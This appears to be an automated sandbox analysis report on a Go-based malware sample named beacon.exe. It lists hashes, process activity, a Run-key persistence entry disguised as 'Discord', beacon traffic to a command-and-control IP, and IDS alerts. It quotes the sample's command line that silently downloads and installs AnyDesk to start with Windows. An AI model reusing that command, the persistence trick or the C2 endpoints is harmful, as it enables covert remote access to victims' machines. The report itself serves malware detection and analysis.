File name:

beacon.exe

Full analysis: https://app.any.run/tasks/4bbd8315-2641-429f-8aa2-05025c77c48c
Verdict: Malicious activity
Analysis date: April 15, 2025, 17:14:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
golang
anydesk
rmm-tool
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 15 sections
MD5:

B6DA6E98198299498ABE1B10EAEC5F74

SHA1:

B757D7C52B39633D40519F6092ECBDF5C37C1150

SHA256:

F108A0526F6C52EF8C11806839846E85D5BA2984578E2403CD8F7EAECF828018

SSDEEP:

98304:KN3od5CrxF/mytwEqNaOhEO1TP6qQNrZSCcrBG9kvQnSTX22FaAdUN0bkc9CMtsh:hl/T1W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • beacon.exe (PID: 7324)
  • SUSPICIOUS

    • Execution of CURL command

      • cmd.exe (PID: 5776)
      • beacon.exe (PID: 7324)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 5776)
      • beacon.exe (PID: 7324)
    • Application launched itself

      • cmd.exe (PID: 5776)
    • Executable content was dropped or overwritten

      • curl.exe (PID: 7292)
    • Connects to the server without a host name

      • beacon.exe (PID: 7324)
    • ANYDESK mutex has been found

      • AnyDesk.exe (PID: 6676)
      • AnyDesk.exe (PID: 6944)
    • The executable file from the user directory is run by the CMD process

      • AnyDesk.exe (PID: 6944)
      • AnyDesk.exe (PID: 6676)
    • ANYDESK has been found

      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 5776)
  • INFO

    • Checks supported languages

      • beacon.exe (PID: 7324)
      • curl.exe (PID: 7292)
      • AnyDesk.exe (PID: 6676)
      • curl.exe (PID: 5008)
      • AnyDesk.exe (PID: 6944)
    • Application based on Golang

      • beacon.exe (PID: 7324)
    • Detects GO elliptic curve encryption (YARA)

      • beacon.exe (PID: 7324)
    • Reads the computer name

      • beacon.exe (PID: 7324)
      • curl.exe (PID: 7292)
      • AnyDesk.exe (PID: 6676)
      • curl.exe (PID: 5008)
      • AnyDesk.exe (PID: 6944)
    • Drops encrypted JS script (Microsoft Script Encoder)

      • beacon.exe (PID: 7324)
    • Execution of CURL command

      • cmd.exe (PID: 7276)
      • cmd.exe (PID: 3240)
    • Create files in a temporary directory

      • curl.exe (PID: 7292)
      • curl.exe (PID: 5008)
    • The sample compiled with english language support

      • curl.exe (PID: 7292)
    • Creates files or folders in the user directory

      • AnyDesk.exe (PID: 6676)
    • Reads the software policy settings

      • slui.exe (PID: 7452)
      • slui.exe (PID: 1040)
    • Checks proxy server information

      • slui.exe (PID: 1040)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 3
CodeSize: 2659840
InitializedDataSize: 257024
UninitializedDataSize: -
EntryPoint: 0x74500
OSVersion: 6.1
ImageVersion: 1
SubsystemVersion: 6.1
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
147
Monitored processes
13
Malicious processes
1
Suspicious processes
3

Behavior graph

Click at the process to see the details
start beacon.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe cmd.exe no specs cmd.exe no specs curl.exe anydesk.exe no specs slui.exe cmd.exe no specs cmd.exe no specs curl.exe anydesk.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1040C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1188cmd /C "echo2 "C:\Windows\System32\cmd.exebeacon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
3240cmd /C "curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe && AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win"C:\Windows\System32\cmd.exebeacon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
11341829
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
5008curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
5776cmd /C "cmd.exe /c curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe && AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win"C:\Windows\System32\cmd.exebeacon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
11341829
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
6676AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-winC:\Users\admin\AppData\Local\Temp\AnyDesk.execmd.exe
User:
admin
Company:
AnyDesk Software GmbH
Integrity Level:
MEDIUM
Description:
AnyDesk
Exit code:
11341829
Version:
9.5.1
Modules
Images
c:\users\admin\appdata\local\temp\anydesk.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\winmm.dll
6944AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-winC:\Users\admin\AppData\Local\Temp\AnyDesk.execmd.exe
User:
admin
Company:
AnyDesk Software GmbH
Integrity Level:
MEDIUM
Description:
AnyDesk
Exit code:
11341829
Version:
9.5.1
Modules
Images
c:\users\admin\appdata\local\temp\anydesk.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\winmm.dll
7276cmd.exe /c curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
7292curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\crypt32.dll
7324"C:\Users\admin\AppData\Local\Temp\beacon.exe" C:\Users\admin\AppData\Local\Temp\beacon.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\local\temp\beacon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\umpdc.dll
Total events
1 791
Read events
1 790
Write events
1
Delete events
0

Modification events

(PID) Process:(7324) beacon.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Discord
Value:
C:\Users\admin\AppData\Local\Temp\beacon.exe
Executable files
1
Suspicious files
0
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
6676AnyDesk.exeC:\Users\admin\AppData\Roaming\AnyDesk\system.conf~RF119131.TMP
MD5:
SHA256:
7292curl.exeC:\Users\admin\AppData\Local\Temp\AnyDesk.exeexecutable
MD5:77DD4393183A61D9D5FDAD9FFA79A2F7
SHA256:6CCEA6A959128112613D7A82C067F8CCC78F05F1F8F47348FC9FECF269F0F21A
6676AnyDesk.exeC:\Users\admin\AppData\Roaming\AnyDesk\ad.tracetext
MD5:0EC6BFA55384B0581AC7E6EC3E52B2CF
SHA256:08B40B69D0C70190E5237E382B05D2B40A5488FF62A4915CDA33E8CF2545300E
6676AnyDesk.exeC:\Users\admin\AppData\Roaming\AnyDesk\system.conf.newtext
MD5:9C920C4985A86DEF63FB4039E458F5ED
SHA256:346A8D8B8D5946D55653DFB405293A787B8D757D7C83514946A0769282261AF0
6676AnyDesk.exeC:\Users\admin\AppData\Roaming\AnyDesk\system.conftext
MD5:9C920C4985A86DEF63FB4039E458F5ED
SHA256:346A8D8B8D5946D55653DFB405293A787B8D757D7C83514946A0769282261AF0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
152
TCP/UDP connections
32
DNS requests
16
Threats
293

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
95.101.54.122:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7324
beacon.exe
GET
200
193.124.117.89:80
http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command
unknown
7324
beacon.exe
POST
201
193.124.117.89:80
http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/connect
unknown
7324
beacon.exe
GET
200
193.124.117.89:80
http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command
unknown
7324
beacon.exe
GET
200
193.124.117.89:80
http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command
unknown
7324
beacon.exe
GET
200
193.124.117.89:80
http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command
unknown
7324
beacon.exe
GET
200
193.124.117.89:80
http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command
unknown
7324
beacon.exe
GET
200
193.124.117.89:80
http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command
unknown
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7324
beacon.exe
GET
200
193.124.117.89:80
http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6544
svchost.exe
40.126.32.134:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2104
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
95.101.54.122:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
7324
beacon.exe
193.124.117.89:80
JSC Mediasoft ekspert
RU
unknown
3216
svchost.exe
172.211.123.248:443
MICROSOFT-CORP-MSN-AS-BLOCK
FR
unknown
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
6544
svchost.exe
40.126.32.68:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.78
whitelisted
crl.microsoft.com
  • 95.101.54.122
  • 95.101.54.128
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 40.127.240.158
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
download.anydesk.com
  • 104.18.30.170
  • 104.18.31.170
whitelisted
c.pki.goog
  • 142.250.186.99
whitelisted
nexusrules.officeapps.live.com
  • 52.111.236.22
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
Misc activity
ET INFO Go-http-client User-Agent Observed Outbound
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
Misc activity
ET INFO Go-http-client User-Agent Observed Outbound
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
Misc activity
ET INFO Go-http-client User-Agent Observed Outbound
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
Misc activity
ET INFO Go-http-client User-Agent Observed Outbound
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
No debug info